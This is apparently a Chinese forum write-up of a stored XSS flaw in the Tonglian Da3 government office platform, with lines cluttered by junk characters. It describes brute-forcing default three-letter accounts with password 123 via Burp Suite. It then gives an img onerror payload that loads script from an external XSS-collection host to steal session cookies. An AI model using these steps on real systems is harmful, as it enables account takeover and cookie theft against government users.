! @2 j. L- A5 S2 H! ^( Z; P
: e D) w( ]- R( o" u0 n 同联Da3协同办公平台后台通用储存型xss漏洞
. |1 g$ d% s) c3 t: c% s( Q6 U# B
! T% n* | O T
* r& w d2 O; b; [- |9 k! e
平台简介:* h4 b$ @6 ?: G. j! Q
* C8 ~+ F% E+ g$ f# |
: C* ?) [' |2 I% R: Z) d e8 D
# U* p0 \( q/ x6 H
& m5 x" f9 u: i7 z! E$ k
+ } n, S2 d' j& x 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
, Y W/ L: v! K2 P6 U( @# ]
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
+ ^; }8 I% m- J4 F: n! g5 C同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!- N' b, C* E7 Y |
* q3 v1 ?+ }( r
6 k* d1 U* N0 u5 c & J8 D; ] y/ T* ]- o. h4 I* H+ [
5 X) o; _2 U# C4 X5 Y
) m5 Q( |& S/ M) ?4 e# t9 V1 ` 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
- ?( A8 p d4 N# {$ J5 h# D
8 P) f5 j; ?6 D! p
7 n- v5 D; G) K1 M1 k8 T" [+ D
2 ?& {, Z5 u$ |- R/ H+ h7 z6 |
- j# a9 ~5 F" v% P0 j
3 I) R8 [2 J3 O' i http://1.1.1.1:7197/cap-aco/#(案例2-)' n% _1 R# A8 m5 O) d7 [5 x! M
& h+ v* I2 r& F- ^* @
1 N' h0 H7 N- L% y" l) R R
http://www.XXOO.com (案例1-官网网站)
`: H* J( F3 Z8 b6 D
1 K. T1 d2 o/ C! b# F: r
. L/ f8 F- E6 g# S; ~% v3 ` 漏洞详情:8 h; D; f+ m: ~) p
& v9 u7 R) _# Q9 M, x8 ~7 S8 z# m
8 Q9 e" v+ q3 J; H# G5 a 案例一、( h8 ~( p8 J) ` V* m
6 K# c; R0 y, _: Z, [8 |3 t
7 i( ? [, q( i6 B3 X S& t 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 C( d! X9 V# F& `7 D
2 k9 {+ V: d: }# G
1 t1 x# Q! q1 B3 x8 M* Y+ a 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
8 |4 `% _; S' `$ @5 V
+ D' j# l! @! O5 A5 O1 M
( B3 Y, a! e6 k$ ~) o
( X* t% p( Y1 ^1 t
) B _0 c- R( _: R
* W# Z3 B1 x; N8 s 
; j% W; ^% s% k
& e1 c. Z2 W8 u/ _
( j, R3 o, K* x' `- U; N
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: x7 v# I! @2 L+ M( E+ B
& Q4 S+ K B1 A7 K) N
, H5 p1 Z. k3 v4 }
6 l( ?6 g( p1 B& `& J1 x% w
. R7 \5 R* ^2 R' {# p6 W
& Z: o& U3 ~6 v. y$ b, x. d$ Y 
7 p: ^# f+ z. M! ~2 F, T
& E7 {- u& _) E5 h7 b
& c* ^ T8 E& w! C4 Y6 ]" p1 d; y/ Y: s
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
) [. Y9 S2 _, J7 o2 y3 d$ T
3 r2 y" d& k) }
" ?0 ^1 m/ Q, |& r# \( ~0 s/ o " W" a( i6 e! V* ^
$ S2 \5 J3 Z" w+ z
7 `% l5 i9 R2 a. `# ?* Q% F/ A: ^- P6 e
<img src=x/ Y! L5 g( y$ ~( _4 e% ~$ |
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
! @) \8 ^' g: ~! {& z
* W7 O/ m4 C$ a: _
! I3 v) d# A0 f$ ?. t! } 
v7 o: ?6 Z/ h3 |5 g, Q5 ~- @
* |' I8 f* t" X {3 o* W4 K
( Q/ f' m" l' {% W0 | a1 p 然后发送,接收cookie如图: ( \! ?% {; P5 y/ \) T0 @
/ ?8 M7 }# @! Z* Q
/ M# z0 Z8 n. q0 c1 X9 i8 B( X1 Y
% x4 N4 o$ O& w
5 E' _/ d; p) G, g: r3 C. V5 T2 K& u
% j& Y2 ~" m V: R
0 b5 @- _7 J& a8 K
3 ?/ @% ~9 U$ ]- m
% i: X J ]) A U; \
0 M, @; R1 }5 T B$ N4 a
0 u, L0 i7 _$ T. Z 0 v) p8 c4 h& e/ C H, c
+ H8 y$ z% _; p3 J, C
! ?: e/ C1 P+ A
% _: k4 Z7 f! [9 F: @
3 D" C7 O/ t% {8 T8 k6 t
5 R7 I! S4 R- C, ~* ?1 r9 H8 t; D
; P7 \3 I5 B7 r' N+ s4 U 
7 D u6 K: b* r: |* v
- C8 q! Y% V: _, g' ~$ I, ]
! J! R" {( a4 V3 i+ p
" f: ]5 c1 N/ m
9 C" d6 A/ U* G) F, i& k' g 0 n! o! x X7 A- |9 b8 ?
案例2、
9 Q9 E4 }& N, |8 k8 C& V
9 }* r5 Z! c6 `, {1 Q7 Y7 K7 X, \
% Q0 f: s/ C( b4 M, P 前面步骤都一样,下面看效果图:
6 X% s. p7 j4 L V9 ^) y; ~
* ^. |" d6 G& \; d( V$ v9 d3 L
0 p& D9 x3 _' m/ ? 
v) ?% P. e- E5 x/ S; q- q' s
9 z% e: Y1 L9 |, f* Y
8 ]4 f% Z7 l; O0 o8 x
, O2 P9 n# Y1 Y# U/ X
4 T+ E) y/ o5 m* F& s
) U1 o1 Y9 S% w' ]. ] 4 `4 W! d3 x' u' \! [- v( {
1 Y. h( C$ ?) M8 T8 S- z* t 2 t% F' S( e& Q* K
/ X& X: e/ |5 s4 j& A
2 q. L1 U7 S7 _- _* m, h+ L
6 M& w% b, Y: C$ a" V( @+ k
) C4 \5 Z3 J3 s
, E/ Y% V8 W& z; J% s1 ~! ?
/ T* B( u7 g5 o. S% _0 Y$ S5 r
& M( B8 j7 u1 x" U) Q
: H2 ?2 I2 s1 X( H& V: w9 \: Q
4 {' |/ l( I" P- c) w9 W# M1 i ' W4 u) E, O( N2 L6 [
- [0 A7 Z" |8 A# Y% \
% D* A: `6 A2 o/ s2 M
4 h4 T- X+ U6 V' u8 W* R
Y& T& R$ E3 t+ D2 u
. M; c- b" n8 A* P
9 F) F9 Y! g' e6 o& h& @( L; Z' o/ ^
0 H6 O, t6 I' Y' L: }0 X9 j